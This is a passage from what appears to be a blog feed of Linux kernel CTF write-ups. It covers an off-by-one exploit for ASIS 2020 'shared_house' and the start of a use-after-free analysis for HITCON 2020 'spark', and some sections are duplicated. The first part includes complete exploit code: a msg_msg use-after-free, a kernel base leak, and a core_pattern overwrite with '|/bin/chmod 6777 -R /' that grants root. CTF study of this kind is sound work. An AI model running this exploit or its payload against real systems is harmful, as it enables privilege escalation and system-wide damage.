</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0xC12ED004</span> <span style="color:#f92672">||</span> <span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">copy_to_user</span>(req.data, note, </span></span><span style="display:flex;"><span> req.size)) { <span style="color:#75715e">// cmd == 0xC12ED004: read_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>ERROR: </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22</span>; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>The vulnerability is obvious. The <a href="https://en.wikipedia.org/wiki/Off-by-one_error">off-by-one</a> in write_note.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="enviroment">Enviroment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v4.19.98/source"><code>4.19.98</code></a> <ul> <li>No SMAP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="features">Features</h3> <p>This challenge provide simple device (it has only one function: <code>mod_ioctl</code>). And the function is like following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> __padding0[<span style="color:#ae81ff">4</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>data; </span></span><span style="display:flex;"><span>}; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>uint64_6 <span style="color:#a6e22e">mod_ioctl</span>(<span style="color:#66d9ef">struct</span> file <span style="color:#f92672">*</span>a1, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> cmd, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int64</span> arg) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> req; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>(<span style="color:#f92672">&amp;</span>req, arg, <span style="color:#ae81ff">0x10LL</span>)) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">14LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (req.size <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0x80</span>) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED002</span>) { <span style="color:#75715e">// cmd == 0xC12ED002: delete_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED001</span>) { <span style="color:#75715e">// cmd == 0xC12ED001: alloc_new_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (note) <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> size <span style="color:#f92672">=</span> req.size; </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> (<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">_kmalloc</span>(req.size, <span style="color:#ae81ff">0x6080C0LL</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED003</span>) { <span style="color:#75715e">// cmd == 0xC12ED003: write_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> <span style="color:#a6e22e">copy_from_user</span>(note, req.data, req.size)) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> note[req.size] <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; <span style="color:#75715e">// off-by-one if req.size==size </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0xC12ED004</span> <span style="color:#f92672">||</span> <span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">copy_to_user</span>(req.data, note, </span></span><span style="display:flex;"><span> req.size)) { <span style="color:#75715e">// cmd == 0xC12ED004: read_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>ERROR: </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22</span>; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>The vulnerability is obvious. The <a href="https://en.wikipedia.org/wiki/Off-by-one_error">off-by-one</a> in write_note.</p> <h2 id="exploit">Exploit</h2> <p>Since the off-by-one occurs in heap chunk, I decide to use <a href="https://elixir.bootlin.com/linux/v4.19.98/source/include/linux/msg.h#L9"><code>struct msg_msg</code></a> and free list. Unlike The free list is in middle and stored protected in latest kernel, it is in front and stored raw in the provided kernel.</p> <h3 id="trigger-off-by-one">Trigger off-by-one</h3> <p>Triggering off-by-one is simple:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#a6e22e">vuln_dev_alloc_new_note</span>(<span style="color:#ae81ff">0x20</span>); </span></span><span style="display:flex;"><span><span style="color:#a6e22e">vuln_dev_write_note</span>(buf, <span style="color:#ae81ff">0x20</span>); <span style="color:#75715e">// Trigger off-by-one </span></span></span></code></pre></div><h3 id="get-controlleduaf-msg_msg-chunk">Get controlled(UAF) msg_msg chunk</h3> <p>In <code>struct msg_msg</code>, the <code>m_list.next</code> and <code>m_list.prev</code> exist. And they are connected with other messages by using double linked list.</p> <p>Because we can overwrite 1 byte after our <code>note</code>, we can overwrite LSB of <code>m_list.next</code> if the message is located after our <code>note</code>. My plain is &ldquo;making dangling pointer in <code>m_list</code> to free-ed message and make the free-ed chunk become our note.</p> <p>For example, initial messages (consider all messages locate consequently):</p> <pre class="mermaid"> graph LR A[msg 1] --&gt;|next| B A --&gt;|prev| E B[msg 2] --&gt;|next| C B --&gt;|prev| A C[msg 3] --&gt;|next| D C --&gt;|prev| B D[msg 4] --&gt;|next| E D --&gt;|prev| C E[msg 5] --&gt;|next| F E --&gt;|prev| D F[msg 6] --&gt;|next| A F --&gt;|prev| E </pre> <p>And free middle message (msg 2) via <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msg.c#L1098"><code>do_msgrcv</code></a> and allocate it as our note:</p> <pre class="mermaid"> graph LR A[msg 1] --&gt;|next| C A --&gt;|prev| E B[msg 2 = our note] C[msg 3] --&gt;|next| D C --&gt;|prev| A D[msg 4] --&gt;|next| E D --&gt;|prev| C E[msg 5] --&gt;|next| F E --&gt;|prev| D F[msg 6] --&gt;|next| A F --&gt;|prev| E </pre> <p>Make invalid <code>m_list.next</code> via triggering off-by-one:</p> <pre class="mermaid"> graph LR A[msg 1] --&gt;|next| C A --&gt;|prev| E B[msg 2 = our note] C[msg 3; next is corrupted] --&gt;|next| E C --&gt;|prev| A D[msg 4] --&gt;|next| E D --&gt;|prev| C E[msg 5] --&gt;|next| F E --&gt;|prev| D F[msg 6] --&gt;|next| A F --&gt;|prev| E </pre> <p>With this connections, the <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msg.c#L1163">unlink</a> of <code>msg 5</code> and <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msg.c#L1259"><code>free_msg</code></a> to it make dangling pointer to <code>msg 5</code> in <code>msg 3</code>.</p> <p>After freeing <code>msg 5</code>, the allocated note will be have same address with <code>msg 5</code>. Then we can make <code>limited_aar</code> using <code>next</code> in <code>struct msg_msg</code>. The disadventage of <code>limited_aar</code> is 1. the first 8 bytes must be zeros (because of <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msgutil.c#L161"><code>store_msg</code></a>) 2. the read address will be freed (because of <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msgutil.c#L180"><code>free_msg</code></a>).</p> <p>But we can leak the address of <code>msg 5</code>(UAF chunk) and kernel base only with <code>limited_arr</code>.</p> <h3 id="overwrite-free-list-and-allocate-arbitrary-address-via-kmalloc">Overwrite free list and allocate arbitrary address via <code>kmalloc</code></h3> <p>Okay, now we can allocate arbitrary address by modifying free list in free-ed chunk. Currently the <code>note</code> (this is same as <code>msg 5</code>) is freed and thus it has pointer to next free-ed chunk. So overwriting it with <code>core_pattern</code> address, allocating serveral chunks and ETC give us the <code>core_pattern</code> as <code>note</code>.</p> <h3 id="code">Code</h3> <div class="collapsable-code"> <input id="295763184" type="checkbox" checked /> <label for="295763184"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">AsisCTF2020Qual-shared_house-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;stddef.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/ipc.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/msg.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;unistd.h&gt; #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define KERNEL_BASE_MASK (~0x00000000000fffff) #define IS_IN_KERNEL_RANGE(addr) \ ((addr) &gt;= KERNEL_BASE_START &amp;&amp; (addr) &lt;= KERNEL_BASE_END) #define MOD_PROBE_OFFSET (0xffffffff81c2c540 - KERNEL_BASE_START) #define CORE_PATTERN_OFFSET (0xffffffff81c36c80 - KERNEL_BASE_START) static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } struct msg_msgseg { struct msg_msgseg* next; char data[0]; }; struct msg_msg { struct msg_msg *next, *prev; long m_type; size_t m_ts; struct msg_msgseg* next_data; void* security; char data[0]; }; struct msgbuf { long mtype; /* message type, must be &gt; 0 */ char mtext[1]; /* message data */ }; int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; memcpy(m-&gt;mtext, data, size); m-&gt;mtype = mtype; ret = msgsnd(msgqid, m, size, mflag); free(m); return ret; } int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; m-&gt;mtype = mtype; ret = msgrcv(msgqid, m, size, mtype, mflag); memcpy(data, m-&gt;mtext, size); free(m); return ret; } #define VULN_DEV_NAME &#34;/dev/note&#34; #define VULN_DEV_CONST_MAX_SIZE 0x80 #define VULN_DEV_CMD_ALLOC_NEW_NOTE 0xC12ED001 #define VULN_DEV_CMD_DELTE_NOTE 0xC12ED002 #define VULN_DEV_CMD_WRITE_NOTE 0xC12ED003 #define VULN_DEV_CMD_READ_NOTE 0xC12ED004 typedef struct request_t { unsigned int size; char __padding[4]; uint64_t data; } request_t; static int vuln_dev_alloc_new_note(unsigned int size); static int vuln_dev_delete_note(); static int vuln_dev_write_note(const void* data, unsigned int size); static int vuln_dev_read_note(void* data, unsigned int size); int vuln_fd = 0; static int vuln_dev_alloc_new_note(unsigned int size) { request_t req = {.size = size}; return ioctl(vuln_fd, VULN_DEV_CMD_ALLOC_NEW_NOTE, &amp;req); } static int vuln_dev_delete_note() { request_t req = {.size = 0}; return ioctl(vuln_fd, VULN_DEV_CMD_ALLOC_NEW_NOTE, &amp;req); } static int vuln_dev_write_note(const void* data, unsigned int size) { request_t req = {.data = (uint64_t)data, .size = size}; return ioctl(vuln_fd, VULN_DEV_CMD_WRITE_NOTE, &amp;req); } static int vuln_dev_read_note(void* data, unsigned int size) { request_t req = {.data = (uint64_t)data, .size = size}; return ioctl(vuln_fd, VULN_DEV_CMD_READ_NOTE, &amp;req); } int target_obj_size = 0; int msgqid = 0; void* fake_msgmsg = NULL; int uaf_msgmsg_mtype = 0; static int make_uaf_msgmsg(char* temp_buf) { char* buf = temp_buf; buf[target_obj_size - 1] = 0; for (int i = 0; i &lt; 0x10; ++i) { memset(buf, i, target_obj_size - 0x30); send_msg(msgqid, buf, target_obj_size - 0x30, 0x10 - i, 0); } recv_msg(msgqid, buf, target_obj_size - 0x30, 0, 0); vuln_dev_alloc_new_note(target_obj_size); memset(buf, 0, target_obj_size); vuln_dev_write_note(buf, target_obj_size); // Trigger off-by-one vuln_dev_delete_note(); for (int i = 0; i &lt; 0x10; ++i) { memset(buf, 0, target_obj_size); vuln_dev_delete_note(); int t = recv_msg(msgqid, buf, target_obj_size, -(i + 1), 0); if (*buf == &#39;A&#39;) { return -(i + 1); } else if (i == 0x10 - 1) { fatal(&#34;[-] Failed to find UAF msg_msg&#34;); } vuln_dev_alloc_new_note(target_obj_size); memset(buf, 0, target_obj_size); struct msg_msg* fake_msg = (struct msg_msg*)buf; fake_msg-&gt;next = (struct msg_msg*)fake_msg; fake_msg-&gt;prev = (struct msg_msg*)fake_msg; fake_msg-&gt;m_type = 1; fake_msg-&gt;m_ts = target_obj_size; memset(fake_msg-&gt;data, &#39;A&#39;, 1); vuln_dev_write_note(buf, target_obj_size); } return 1; } /// @brief Limited AAR primitive. The 8 bytes before target address must be /// zeros. /// @param out_data: output buffer /// @param addr: target address /// @param size: size of output buffer. size must be less than or equal to /// (0x1000-0x10) /// @return positive on success, -1 on failure static int limited_aar(char* out_data, uint64_t addr, uint64_t size) { int ret; char* buf[target_obj_size]; memset(buf, 0, sizeof(buf)); struct msg_msg* uaf_msg = (struct msg_msg*)buf; uaf_msg-&gt;next = (struct msg_msg*)fake_msgmsg; uaf_msg-&gt;prev = (struct msg_msg*)fake_msgmsg; uaf_msg-&gt;m_type = 1; uaf_msg-&gt;m_ts = 0x1000 - offsetof(struct msg_msg, data) + size; uaf_msg-&gt;next_data = (struct msg_msgseg*)(addr - 8); vuln_dev_write_note(buf, target_obj_size); char temp_buf[0x2000]; ret = recv_msg(msgqid, temp_buf, 0x2000, uaf_msgmsg_mtype, 0); memcpy(out_data, temp_buf + 0x1000 - offsetof(struct msg_msg, data), size - 8); } static int leak_uaf_chunk_addr_and_kernel_addr(uint64_t pre_uaf_msg_addr, char* temp_buf, uint64_t* out_uaf_chunk_addr, uint64_t* out_kernel_base) { char* buf[target_obj_size]; memset(buf, 0, sizeof(buf)); *out_uaf_chunk_addr = 0; *out_kernel_base = 0; limited_aar(temp_buf, pre_uaf_msg_addr, 0x1000 - offsetof(struct msg_msgseg, data)); vuln_dev_read_note(buf, target_obj_size); *out_uaf_chunk_addr = *(uint64_t*)buf; uint64_t* uint64_buf = (uint64_t*)temp_buf; for (int i = 0; i &lt; (0x2000 - offsetof(struct msg_msg, data) - offsetof(struct msg_msgseg, data)) / 8; ++i) { if (IS_IN_KERNEL_RANGE(uint64_buf[i])) { uint64_t min_addr = uint64_buf[i] &amp; KERNEL_BASE_MASK; if (*out_kernel_base == 0 || min_addr &lt; *out_kernel_base) { *out_kernel_base = min_addr; } } } if (*out_kernel_base == 0 || *out_uaf_chunk_addr == 0) { return -1; } return 0; } int main() { vuln_fd = open(VULN_DEV_NAME, O_RDONLY); if (vuln_fd &lt; 0) { fatal(&#34;open(&#34; VULN_DEV_NAME &#34;)&#34;); } target_obj_size = 0x80; char buf[target_obj_size]; uint64_t* uint64_buf = (uint64_t*)buf; memset(buf, 0, sizeof(buf)); msgqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); if (msgqid &lt; 0) { fatal(&#34;msgget&#34;); } fake_msgmsg = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (fake_msgmsg == MAP_FAILED) { fatal(&#34;mmap&#34;); } printf(&#34;[*] fake_msgmsg: %p\n&#34;, fake_msgmsg); uaf_msgmsg_mtype = make_uaf_msgmsg(buf); if (uaf_msgmsg_mtype &gt; 0) { printf(&#34;[-] Failed to find UAF msg_msg\n&#34;); return -1; } uint64_t prev_uaf_msg = uint64_buf[88 / 8]; printf(&#34;[+] Found UAF msg_msg with mtype: %d\n&#34;, uaf_msgmsg_mtype); printf(&#34; [*] Now note is same as UAF msg_msg\n&#34;); printf(&#34; [*] The prev of UAF msg_msg is 0x%016lx\n&#34;, prev_uaf_msg); vuln_dev_alloc_new_note(target_obj_size); printf(&#34;[*] Leaking UAF chunk addr and kernel base...\n&#34;); char* temp_buf = malloc(0x2000); uint64_t uaf_chunk_addr, kernel_addr; if (leak_uaf_chunk_addr_and_kernel_addr(prev_uaf_msg, temp_buf, &amp;uaf_chunk_addr, &amp;kernel_addr) &lt; 0) { printf(&#34; [-] Failed to leak uaf chunk addr and kernel base\n&#34;); return -1; } printf(&#34; [+] Found UAF chunk address: 0x%016lx\n&#34;, uaf_chunk_addr); printf(&#34; [+] Found kernel address: 0x%016lx\n&#34;, kernel_addr); printf(&#34;[*] Overwrite free list to overwrite modprobe_path\n&#34;); int msgqid2 = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); if (msgqid2 &lt; 0) { fatal(&#34;msgget&#34;); } uint64_t next_free_chunk = kernel_addr + CORE_PATTERN_OFFSET - 8; printf(&#34; [*] Overwriting free list at 0x%016lx to 0x%016lx\n&#34;, uaf_chunk_addr, next_free_chunk); vuln_dev_write_note(&amp;next_free_chunk, 8); printf(&#34; [*] Consume chunks in free list&#34;); send_msg(msgqid2, temp_buf, 0x80 - offsetof(struct msg_msg, data), 0x10, 0); send_msg(msgqid2, temp_buf, 0x80 - offsetof(struct msg_msg, data), 0x11, 0); vuln_dev_delete_note(); send_msg(msgqid2, temp_buf, 0x80 - offsetof(struct msg_msg, data), 0x12, 0); printf(&#34; [*] Now allocate note with addr=0x%016lx\n&#34;, next_free_chunk); vuln_dev_alloc_new_note(0x80); char new_core_pattern[] = &#34;|/bin/chmod 6777 -R /&#34;; memset(temp_buf, 0, 0x2000); strcpy(temp_buf + 8, new_core_pattern); printf(&#34;[*] Overwrite core_pattern to \&#34;%s\&#34;\n&#34;, new_core_pattern); vuln_dev_write_note(temp_buf, 8 + sizeof(new_core_pattern)); { int fd = open(&#34;/proc/sys/kernel/core_pattern&#34;, O_RDONLY); char core[0x100]; read(fd, core, sizeof(core)); if (memcmp(core, new_core_pattern, sizeof(new_core_pattern) - 1) != 0) { printf(&#34; [-] Failed to overwrite core_pattern (core_pattern=\&#34;%s\&#34;)\n&#34;, core); return -1; } } printf(&#34; [+] Successfully overwrite core_pattern\n&#34;); printf(&#34;[*] Trigger core_pattern\n&#34;); uint64_t* evil = (uint64_t*)0xdeadbeef; *evil = 0; close(vuln_fd); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/ASIS/2020/Quals/shared_house">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/ASIS/2020/Quals/shared_house</a></li> <li><a href="https://duasynt.com/blog/cve-2016-6187-heap-off-by-one-exploit">https://duasynt.com/blog/cve-2016-6187-heap-off-by-one-exploit</a></li> </ul> /posts/kernel/write-ups/ctf/hitcon2020-spark/ Tue, 18 Feb 2025 15:33:22 +0000 /posts/kernel/write-ups/ctf/hitcon2020-spark/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.9.11/source"><code>5.9.11</code></a> <ul> <li>No SMAP</li> <li>No SMEP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="module">Module</h3> <p>The source code of module is not provided, but the challenge gives us the demo program using it.</p> <div class="collapsable-code"> <input id="516873924" type="checkbox" checked /> <label for="516873924"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">HITCON2020-spark-demo.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>/* * This is a demo program to show how to interact with SPARK. * Don&#39;t waste time on finding bugs here ;) * * Copyright (c) 2020 david942j */ #include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/spark.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define DEV_PATH &#34;/dev/node&#34; #define N 6 static int fd[N]; const char l[] = &#34;ABCDEF&#34;; /* B -- 10 -- D -- 11 -- F / \ | 4 | | / | | A 5 4 \ | | 2 | | \ | | C -- 3 - E */ static void link(int a, int b, unsigned int weight) { printf(&#34;Creating link between &#39;%c&#39; and &#39;%c&#39; with weight %u\n&#34;, l[a], l[b], weight); assert(ioctl(fd[a], SPARK_LINK, fd[b] | ((unsigned long long)weight &lt;&lt; 32)) == 0); } static void query(int a, int b) { struct spark_ioctl_query qry = { .fd1 = fd[a], .fd2 = fd[b], }; assert(ioctl(fd[0], SPARK_QUERY, &amp;qry) == 0); printf(&#34;The length of shortest path between &#39;%c&#39; and &#39;%c&#39; is %lld\n&#34;, l[a], l[b], qry.distance); } int main(int argc, char *argv[]) { for (int i = 0; i &lt; N; i++) { fd[i] = open(DEV_PATH, O_RDONLY); assert(fd[i] &gt;= 0); } link(0, 1, 4); link(0, 2, 2); link(1, 2, 5); link(1, 3, 10); link(2, 4, 3); link(3, 4, 4); link(3, 5, 11); assert(ioctl(fd[0], SPARK_FINALIZE) == 0); query(0, 5); query(3, 2); query(2, 5); for (int i = 0; i &lt; N; i++) close(fd[i]); return 0; } </code></pre></div> <p>As we can see in <code>demo.c</code>, this module is for a shortest path search. And each node can be allocated by <code>open</code> and two nodes can be linked by <code>link</code>. The searching path is done by <code>query</code>.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.9.11/source"><code>5.9.11</code></a> <ul> <li>No SMAP</li> <li>No SMEP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="module">Module</h3> <p>The source code of module is not provided, but the challenge gives us the demo program using it.</p> <div class="collapsable-code"> <input id="516873924" type="checkbox" checked /> <label for="516873924"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">HITCON2020-spark-demo.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>/* * This is a demo program to show how to interact with SPARK. * Don&#39;t waste time on finding bugs here ;) * * Copyright (c) 2020 david942j */ #include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/spark.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define DEV_PATH &#34;/dev/node&#34; #define N 6 static int fd[N]; const char l[] = &#34;ABCDEF&#34;; /* B -- 10 -- D -- 11 -- F / \ | 4 | | / | | A 5 4 \ | | 2 | | \ | | C -- 3 - E */ static void link(int a, int b, unsigned int weight) { printf(&#34;Creating link between &#39;%c&#39; and &#39;%c&#39; with weight %u\n&#34;, l[a], l[b], weight); assert(ioctl(fd[a], SPARK_LINK, fd[b] | ((unsigned long long)weight &lt;&lt; 32)) == 0); } static void query(int a, int b) { struct spark_ioctl_query qry = { .fd1 = fd[a], .fd2 = fd[b], }; assert(ioctl(fd[0], SPARK_QUERY, &amp;qry) == 0); printf(&#34;The length of shortest path between &#39;%c&#39; and &#39;%c&#39; is %lld\n&#34;, l[a], l[b], qry.distance); } int main(int argc, char *argv[]) { for (int i = 0; i &lt; N; i++) { fd[i] = open(DEV_PATH, O_RDONLY); assert(fd[i] &gt;= 0); } link(0, 1, 4); link(0, 2, 2); link(1, 2, 5); link(1, 3, 10); link(2, 4, 3); link(3, 4, 4); link(3, 5, 11); assert(ioctl(fd[0], SPARK_FINALIZE) == 0); query(0, 5); query(3, 2); query(2, 5); for (int i = 0; i &lt; N; i++) close(fd[i]); return 0; } </code></pre></div> <p>As we can see in <code>demo.c</code>, this module is for a shortest path search. And each node can be allocated by <code>open</code> and two nodes can be linked by <code>link</code>. The searching path is done by <code>query</code>.</p> <p>I think these are all knowlege which we can know from <code>demo.c</code>. So I do reserving <code>spark.ko</code>. The module has 4 features: link, finalize, query, get_info.</p> <h3 id="vulnerability">Vulnerability</h3> <p>The vulnerability is in <code>spark_node_put</code>. When we <code>close</code> the node and if the reference count is one, <code>free</code> the node itself and its double linked list nodes. But when <code>free</code> the node, the node in other node (which is linked with the closed node) is not freed.</p> <p>For example, we allocate 2 nodes(node A and node B) via <code>open</code> and link them. The node A&rsquo;s fd and bk has the pointer to node B. And of course, node B has the pointer to node A in fd and bk. After linking, if we <code>close</code> node B, the node B is free-ed but the pointer in node A is not deleted.</p> <p>The fd and bk in each node are used in <code>spark_node_finalize</code> and <code>spark_graph_query</code>.</p> <h2 id="exploit">Exploit</h2> <h3 id="trigger-uaf">Trigger UAF</h3> <p>As I explained in above, the UAF can be caused by following code:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">int</span> fds[<span style="color:#ae81ff">2</span>]; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> <span style="color:#66d9ef">sizeof</span>(fds) <span style="color:#f92672">/</span> <span style="color:#ae81ff">4</span>; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> fds[i] <span style="color:#f92672">=</span> <span style="color:#a6e22e">open</span>(VULN_DEV_NAME, O_RDONLY); </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#a6e22e">vuln_dev_link</span>(fds[<span style="color:#ae81ff">0</span>], fds[<span style="color:#ae81ff">1</span>], <span style="color:#ae81ff">0</span>); </span></span><span style="display:flex;"><span><span style="color:#a6e22e">close</span>(fds[<span style="color:#ae81ff">1</span>]); </span></span></code></pre></div><h3 id="build-fake-node">Build fake node</h3> <p>The structure of node and linked list node is like:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span> { </span></span><span 